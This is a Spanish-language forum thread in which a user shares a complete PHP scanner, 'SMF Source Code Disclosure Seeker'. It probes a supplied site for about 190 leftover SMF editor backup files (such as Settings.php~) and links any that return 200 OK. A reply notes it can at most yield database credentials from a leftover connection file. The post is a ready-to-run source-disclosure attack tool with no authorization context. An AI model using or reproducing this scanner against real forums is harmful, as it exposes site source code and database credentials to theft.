SMF Source Code Disclosure Seeker

« **en:** Septiembre 02, 2011, 12:20:11 pm »

Esta tool no se si sera muy util pero por las dudas me tome el tiempo de hacerla, mas que nada sirve para ver los archivos temporales que fueron creados cuando se instalan nuevos modulos en el sistema de smf. Les dejo el codigo.

Código: PHP

<html>
<title>SMF Source Code Disclosure Seeker</title>
<style type="text/css">
body{
    background: #000;
    color: #FFF;
    }
a:visited{
         color:#FFF;
         text-decoration: none;
         }
a:link{
         color:#FFF;
         text-decoration: none;
         }
a:hover{
         color:#FF0000;
         text-decoration: blink;
         }
input,option{
     font-family: verdana, sans-serif;
     font-size: 16pt;
     border: gray 2px solid;
     }            
#links{
       margin:0 auto;
       width:860px;
       border-color: #E8E8E8;
       text-align: right;
       } 
</style>
<body>
<div id="links">
<center>
<img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
<form action ="" method="post">
URL : <input type ="text" name="site" size="50"/>
<input type = "submit" value="Test!" />
</form>
<?php
/**
 * 
 *
 * @author Daniel Godoy
 * @copyright 2011
 * @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
 * 
 *  This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 * 
 * 
 **/
set_time_limit(0);
$site = $_POST['site'];
$list = array('index.php~', 'Settings.php~','Settings_bak.php~','/Sources/Admin.php~','/Sources/BoardIndex.php~','/Sources/Calendar.php~','/Sources/Display.php~',
              '/Sources/Errors.php~','/Sources/DumpDatabase.php~','/Sources/Help.php~','/Sources/index.php~','/Sources/Karma.php~','/Sources/Load.php~',
              '/Sources/LockTopic.php~','/Sources/LogInOut.php~','/Sources/ManageAttachments.php~','/Sources/ManageBans.php~','/Sources/ManageBoards.php~',
              '/Sources/ManageCalendar.php~','/Sources/ManageErrors.php~','/Sources/ManageMembergroups.php~','/Sources/ManageMembers.php~',
              '/Sources/ManageNews.php~','/Sources/ManagePermissions.php~','/Sources/ManagePosts.php~','/Sources/ManageRegistration.php~',
              '/Sources/ManageSearch.php~','/Sources/ManageServer.php~','/Sources/ManageShoutbox.php~','/Sources/ManageSmileys.php~','/Sources/Memberlist.php~',
              '/Sources/MessageIndex.php~','/Sources/Memberlist.php~','/Sources/MessageIndex.php~','/Sources/Modlog.php~','/Sources/ModSettings.php~',
              '/Sources/MoveTopic.php~','/Sources/News.php~','/Sources/Notify.php~','/Sources/PackageGet.php~','/Sources/Packages.php~','/Sources/PersonalMessage.php~',
              '/Sources/Poll.php~','/Sources/Post.php~','/Sources/Printpage.php~','/Sources/Profile.php~','/Sources/QueryString.php~','/Sources/Recent.php~',
              '/Sources/Register.php~','/Sources/Reminder.php~','/Sources/RemoveTopic.php~','/Sources/RepairBoards.php~','/Sources/Reports.php~','/Sources/Search.php~',
              '/Sources/Security.php~','/Sources/SendTopic.php~','/Sources/Shoutbox.php~','/Sources/SplitTopics.php~','/Sources/Stats.php~',
              '/Sources/Subs-Auth.php~','/Sources/Subs-Boards.php~','/Sources/Subs-Charset.php~','/Sources/Subs-Compat.php~','/Sources/Subs-Graphics.php~',
              '/Sources/Subs-Members.php~','/Sources/Subs-Package.php~','/Sources/Subs-Post.php~','/Sources/Subs-Shoutbox.php~','/Sources/Subs-Sound.php~',
              '/Sources/Subs.php~','/Sources/Themes.php~','/Sources/ViewQuery.php~','/Sources/Who.php~','/Themes/default/Admin.template.php~',
              '/Themes/default/BoardIndex.template.php~','/Themes/default/Calendar.template.php~','/Themes/default/Combat.template.php~',
              '/Themes/default/Display.template.php~','/Themes/default/Errors.template.php~','/Themes/default/Help.template.php~','/Themes/default/index.php~',
              '/Themes/default/index.template.php~','/Themes/default/Login.template.php~','/Themes/default/ManageAttachments.template.php~',
              '/Themes/default/ManageBans.template.php~','/Themes/default/ManageBoards.template.php~','/Themes/default/ManageCalendar.template.php~',
              '/Themes/default/ManageMembergroups.template.php~','/Themes/default/ManageMembers.template.php~','/Themes/default/ManageNews.template.php~',
              '/Themes/default/ManagePermissions.template.php~','/Themes/default/ManageSearch.template.php~','/Themes/default/ManageShoutbox.template.php~',
              '/Themes/default/ManageSmileys.template.php~','/Themes/default/Memberlist.template.php~','/Themes/default/MessageIndex.template.php~',
              '/Themes/default/Modlog.template.php~','/Themes/default/MoveTopic.template.php~','/Themes/default/Notify.template.php~',
              '/Themes/default/Packages.template.php~','/Themes/default/PersonalMessage.template.php~','/Themes/default/Poll.template.php~',
              '/Themes/default/Post.template.php~','/Themes/default/Printpage.template.php~','/Themes/default/Profile.template.php~',
              '/Themes/default/Recent.template.php~','/Themes/default/Register.template.php~','/Themes/default/Reminder.template.php~',
              '/Themes/default/Reports.template.php~','/Themes/default/Search.template.php~','/Themes/default/SendTopic.template.php~','/Themes/default/Settings.template.php~',
              '/Themes/default/Shoutbox.template.php~','/Themes/default/SplitTopics.template.php~','/Themes/default/Stats.template.php~',
              '/Themes/default/Themes.template.php~','/Themes/default/Who.template.php~','/Themes/default/Wireless.template.php~','/Themes/default/Xml.template.php~',
              '/Themes/default/languages/Admin.english.php~','/Themes/default/languages/Admin.spanish_latin.php~','/Themes/default/languages/Errors.english.php~',
              '/Themes/default/languages/Errors.spanish_latin.php~','/Themes/default/languages/Help.english.php~','/Themes/default/languages/Help.spanish_latin.php~',
              '/Themes/default/languages/index.english.php~','/Themes/default/languages/index.spanish_latin.php~','/Themes/default/languages/Install.english.php~',
              '/Themes/default/languages/Install.spanish_latin.php~','/Themes/default/languages/Login.english.php~','/Themes/default/languages/Login.spanish_latin.php~',
              '/Themes/default/languages/ManageBoards.english.php~','/Themes/default/languages/ManageBoards.spanish_latin.php~','/Themes/default/languages/ManageCalendar.english.php~',
              '/Themes/default/languages/ManageCalendar.spanish_latin.php~','/Themes/default/languages/ManageMembers.english.php~','/Themes/default/languages/ManageMembers.spanish_latin.php~',
              '/Themes/default/languages/ManagePermissions.english.php~','/Themes/default/languages/ManagePermissions.spanish_latin.php~','/Themes/default/languages/ManageSmileys.english.php~',
              '/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~','/Themes/default/languages/Manual.spanish_latin.php~',
              '/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~',
              '/Themes/default/languages/Manual.spanish_latin.php~','/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/Modifications.spanish_latin.php~',
              '/Themes/default/languages/ModSettings.english.php~','/Themes/default/languages/ModSettings.spanish_latin.php~','/Themes/default/languages/Packages.english.php~',
              '/Themes/default/languages/Packages.spanish_latin.php~','/Themes/default/languages/PersonalMessage.english.php~','/Themes/default/languages/PersonalMessage.spanish_latin.php~',
              '/Themes/default/languages/Post.english.php~','/Themes/default/languages/Post.spanish_latin.php~','/Themes/default/languages/Profile.english.php~',
              '/Themes/default/languages/Profile.spanish_latin.php~','/Themes/default/languages/Reports.english.php~','/Themes/default/languages/Reports.spanish_latin.php~',
              '/Themes/default/languages/Search.english.php~','/Themes/default/languages/Search.spanish_latin.php~','/Themes/default/languages/Settings.english.php~',
              '/Themes/default/languages/Settings.spanish_latin.php~','/Themes/default/languages/Shoutbox.english.php~','/Themes/default/languages/Stats.english.php~',
              '/Themes/default/languages/Stats.spanish_latin.php~','/Themes/default/languages/Themes.english.php~','/Themes/default/languages/Themes.spanish_latin.php~',
              '/Themes/default/languages/Who.english.php~','/Themes/default/languages/Who.spanish_latin.php~','/Themes/default/languages/Wireless.english.php~',
              '/Themes/default/languages/Wireless.spanish_latin.php~',              
             );
 
if(isset($site)){
                foreach($list as $path => $test) {
                                                 $ch = curl_init();
                                                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                 curl_setopt($ch, CURLOPT_HEADER, 1);
                                                 curl_setopt($ch, CURLOPT_URL, $site.$test);
                                                 $result = curl_exec($ch);
                                                 curl_close($ch);
if (preg_match("/200 OK/", $result)){
                                    flush();
                                    echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
                                    ob_flush();
                                    }
                                    
                                  
                                                }      
                }
 
?>
</center>
</div>
</body>
</html>
 

« **Respuesta #1 en:** Septiembre 06, 2011, 12:02:26 am »

útil lo es, otra cosa es que sea es que sea eficaz a la hora de encontrar sacar datos útiles, en este caso como mucho se sacará la bd siempre y cuando esté el archivo temporal de la conexión.
Gracias por aportar

[SOURCE] Mensaje antes de header , pop up php , alert antes de header Iniciado por graphixx	Respuestas: 1 Vistas: 3228	Octubre 05, 2014, 03:26:32 pm por alexander1712
[Source] Verificar si una dirección IP es válida y si es IPv6 o IPv4 Iniciado por Polsaker	Respuestas: 1 Vistas: 1522	Octubre 22, 2014, 10:50:39 pm por alexander1712
[Source] Verificar si una dirección IP está en una DNSBL Iniciado por Polsaker	Respuestas: 2 Vistas: 1544	Octubre 22, 2014, 10:51:27 pm por alexander1712
[SOURCE] Convertir numero a texto con PHP (Class) Iniciado por kid_goth	Respuestas: 1 Vistas: 1109	Septiembre 09, 2014, 04:29:24 pm por ANTRAX

Esta es una respuesta al tema: SMF Source Code Disclosure Seeker en La plantilla. Back-end

SMF Source Code Disclosure Seeker

hielasangre

SMF Source Code Disclosure Seeker

FahD

Re:[PHP]SMF Source Code Disclosure Seeker

Similar topics (4)